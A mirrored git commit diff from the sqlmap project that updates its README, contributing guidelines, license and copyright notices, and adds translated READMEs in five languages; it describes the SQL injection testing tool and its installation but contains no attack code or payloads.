mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-31 18:39:46 +03:00
commit
45bb013539
1
.gitattributes
vendored
1
.gitattributes
vendored
|
@ -1,4 +1,5 @@
|
||||||
*.py text eol=lf
|
*.py text eol=lf
|
||||||
|
*.conf text eol=lf
|
||||||
|
|
||||||
*_ binary
|
*_ binary
|
||||||
*.dll binary
|
*.dll binary
|
||||||
|
|
|
@ -3,13 +3,13 @@
|
||||||
## Reporting bugs
|
## Reporting bugs
|
||||||
|
|
||||||
**Bug reports are welcome**!
|
**Bug reports are welcome**!
|
||||||
Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues) or, alternatively, to the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users).
|
Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
|
||||||
|
|
||||||
### Guidelines
|
### Guidelines
|
||||||
|
|
||||||
* Before you submit a bug report, search both open and closed issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
|
* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
|
||||||
* Make sure you can reproduce the bug with the latest development version of sqlmap.
|
* Make sure you can reproduce the bug with the latest development version of sqlmap.
|
||||||
* Your report should give detailed instructions for how to reproduce the problem. If sqlmap raises an unhandled exception, the traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
|
* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
|
||||||
* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
|
* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
|
||||||
* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
|
* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
|
||||||
|
|
||||||
|
@ -35,4 +35,4 @@ In order to maintain consistency and readability throughout the code, we ask tha
|
||||||
|
|
||||||
### Licensing
|
### Licensing
|
||||||
|
|
||||||
By submitting code contributions to the sqlmap developers, to the mailing lists, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap project the unlimited, non-exclusive right to reuse, modify, and relicense the code. sqlmap will always be available Open Source, but this is important because the inability to relicense code has caused devastating problems for other Free Software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
|
By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
|
||||||
|
|
16
README.md
16
README.md
|
@ -1,6 +1,7 @@
|
||||||
sqlmap
|
sqlmap
|
||||||
==
|
==
|
||||||
|
|
||||||
|
|
||||||
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||||
|
|
||||||
Screenshots
|
Screenshots
|
||||||
|
@ -19,7 +20,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm
|
||||||
|
|
||||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap works out of the box with [Python](http://www.python.org/download/) version '''2.6.x''' and '''2.7.x''' on any platform.
|
sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
|
||||||
|
|
||||||
Usage
|
Usage
|
||||||
----
|
----
|
||||||
|
@ -32,7 +33,7 @@ To get a list of all options and switches use:
|
||||||
|
|
||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
You can find sample runs [here](https://gist.github.com/stamparm/5335217).
|
You can find a sample run [here](https://gist.github.com/stamparm/5335217).
|
||||||
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
|
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
Links
|
Links
|
||||||
|
@ -48,5 +49,14 @@ Links
|
||||||
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demos: [#1](http://www.youtube.com/user/inquisb/videos) and [#2](http://www.youtube.com/user/stamparm/videos)
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|
||||||
|
Translations
|
||||||
|
----
|
||||||
|
|
||||||
|
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||||
|
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||||
|
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||||
|
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||||
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
of the GNU General Public License (GPL) is appended to this file.
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
This program is free software; you may redistribute and/or modify it under
|
This program is free software; you may redistribute and/or modify it under
|
||||||
the terms of the GNU General Public License as published by the Free
|
the terms of the GNU General Public License as published by the Free
|
||||||
Software Foundation; Version 2 with the clarifications and exceptions
|
Software Foundation; Version 2 (or later) with the clarifications and
|
||||||
described below. This guarantees your right to use, modify, and
|
exceptions described below. This guarantees your right to use, modify, and
|
||||||
redistribute this software under certain conditions. If you wish to embed
|
redistribute this software under certain conditions. If you wish to embed
|
||||||
sqlmap technology into proprietary software, we sell alternative licenses
|
sqlmap technology into proprietary software, we sell alternative licenses
|
||||||
(contact sales@sqlmap.org).
|
(contact sales@sqlmap.org).
|
||||||
|
|
512
doc/THANKS.md
512
doc/THANKS.md
File diff suppressed because it is too large
Load Diff
|
@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
|
||||||
* The Oset library located under thirdparty/oset/.
|
* The Oset library located under thirdparty/oset/.
|
||||||
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
||||||
Copyright (C) 2009, Raymond Hettinger, and others.
|
Copyright (C) 2009, Raymond Hettinger, and others.
|
||||||
|
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||||
|
Copyright (C) 2010, Chris Hall.
|
||||||
* The SocksiPy library located under thirdparty/socks/.
|
* The SocksiPy library located under thirdparty/socks/.
|
||||||
Copyright (C) 2006, Dan-Haim.
|
Copyright (C) 2006, Dan-Haim.
|
||||||
|
|
||||||
|
@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||||
Copyright (C) 2008-2009, Jose Fonseca.
|
Copyright (C) 2008-2009, Jose Fonseca.
|
||||||
* The KeepAlive library located under thirdparty/keepalive/.
|
* The KeepAlive library located under thirdparty/keepalive/.
|
||||||
Copyright (C) 2002-2003, Michael D. Stenner.
|
Copyright (C) 2002-2003, Michael D. Stenner.
|
||||||
* The MultipartPost library located under thirdparty/multipartpost/.
|
* The MultipartPost library located under thirdparty/multipart/.
|
||||||
Copyright (C) 2006, Will Holcomb.
|
Copyright (C) 2006, Will Holcomb.
|
||||||
* The XDot library located under thirdparty/xdot/.
|
* The XDot library located under thirdparty/xdot/.
|
||||||
Copyright (C) 2008, Jose Fonseca.
|
Copyright (C) 2008, Jose Fonseca.
|
||||||
|
@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
|
||||||
Copyright (C) 2012, Marcel Hellkamp.
|
Copyright (C) 2012, Marcel Hellkamp.
|
||||||
* The PageRank library located under thirdparty/pagerank/.
|
* The PageRank library located under thirdparty/pagerank/.
|
||||||
Copyright (C) 2010, Corey Goldberg.
|
Copyright (C) 2010, Corey Goldberg.
|
||||||
* The PrettyPrint library located under thirdparty/prettyprint/.
|
|
||||||
Copyright (C) 2010, Chris Hall.
|
|
||||||
* The Termcolor library located under thirdparty/termcolor/.
|
* The Termcolor library located under thirdparty/termcolor/.
|
||||||
Copyright (C) 2008-2011, Volvox Development Team.
|
Copyright (C) 2008-2011, Volvox Development Team.
|
||||||
|
|
||||||
|
|
53
doc/translations/README-gr-GR.md
Normal file
53
doc/translations/README-gr-GR.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||||
|
|
||||||
|
Εικόνες
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
|
||||||
|
|
||||||
|
Εγκατάσταση
|
||||||
|
----
|
||||||
|
|
||||||
|
Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
|
||||||
|
|
||||||
|
Χρήση
|
||||||
|
----
|
||||||
|
|
||||||
|
Για να δείτε μια βασική λίστα από επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
|
||||||
|
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Σύνδεσμοι
|
||||||
|
----
|
||||||
|
|
||||||
|
* Αρχική σελίδα: http://sqlmap.org
|
||||||
|
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
53
doc/translations/README-hr-HR.md
Normal file
53
doc/translations/README-hr-HR.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||||
|
|
||||||
|
Slike zaslona
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
|
||||||
|
|
||||||
|
Instalacija
|
||||||
|
----
|
||||||
|
|
||||||
|
Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
|
||||||
|
|
||||||
|
Korištenje
|
||||||
|
----
|
||||||
|
|
||||||
|
Kako biste dobili listu osnovnih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Kako biste dobili listu svih opcija i prekidača koristite:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
|
||||||
|
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Poveznice
|
||||||
|
----
|
||||||
|
|
||||||
|
* Početna stranica: http://sqlmap.org
|
||||||
|
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
53
doc/translations/README-id-ID.md
Normal file
53
doc/translations/README-id-ID.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||||
|
|
||||||
|
Tangkapan Layar
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||||
|
|
||||||
|
Instalasi
|
||||||
|
----
|
||||||
|
|
||||||
|
Anda dapat mengunduh tarball versi terbaru [di sini]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
|
||||||
|
|
||||||
|
Penggunaan
|
||||||
|
----
|
||||||
|
|
||||||
|
Untuk mendapatkan daftar opsi dasar gunakan:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217).
|
||||||
|
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Tautan
|
||||||
|
----
|
||||||
|
|
||||||
|
* Situs: http://sqlmap.org
|
||||||
|
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
|
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
53
doc/translations/README-pt-BR.md
Normal file
53
doc/translations/README-pt-BR.md
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||||
|
|
||||||
|
Imagens
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.
|
||||||
|
|
||||||
|
Instalação
|
||||||
|
----
|
||||||
|
|
||||||
|
Você pode baixar o arquivo tar mais recente clicando [aqui]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
|
||||||
|
|
||||||
|
Como usar
|
||||||
|
----
|
||||||
|
|
||||||
|
Para obter uma lista das opções básicas faça:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Para obter a lista completa de opções faça:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217).
|
||||||
|
Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Links
|
||||||
|
----
|
||||||
|
|
||||||
|
* Homepage: http://sqlmap.org
|
||||||
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
|
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
52
doc/translations/README-zh-CN.md
Normal file
52
doc/translations/README-zh-CN.md
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
sqlmap
|
||||||
|
==
|
||||||
|
|
||||||
|
|
||||||
|
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||||
|
|
||||||
|
演示截图
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
|
||||||
|
|
||||||
|
安装方法
|
||||||
|
----
|
||||||
|
|
||||||
|
你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
|
||||||
|
|
||||||
|
推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
|
||||||
|
|
||||||
|
使用方法
|
||||||
|
----
|
||||||
|
|
||||||
|
通过如下命令可以查看基本的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
通过如下的命令可以查看所有的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||||
|
|
||||||
|
链接
|
||||||
|
----
|
||||||
|
|
||||||
|
* 项目主页: http://sqlmap.org
|
||||||
|
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
"""
|
"""
|
||||||
beep.py - Make a beep sound
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
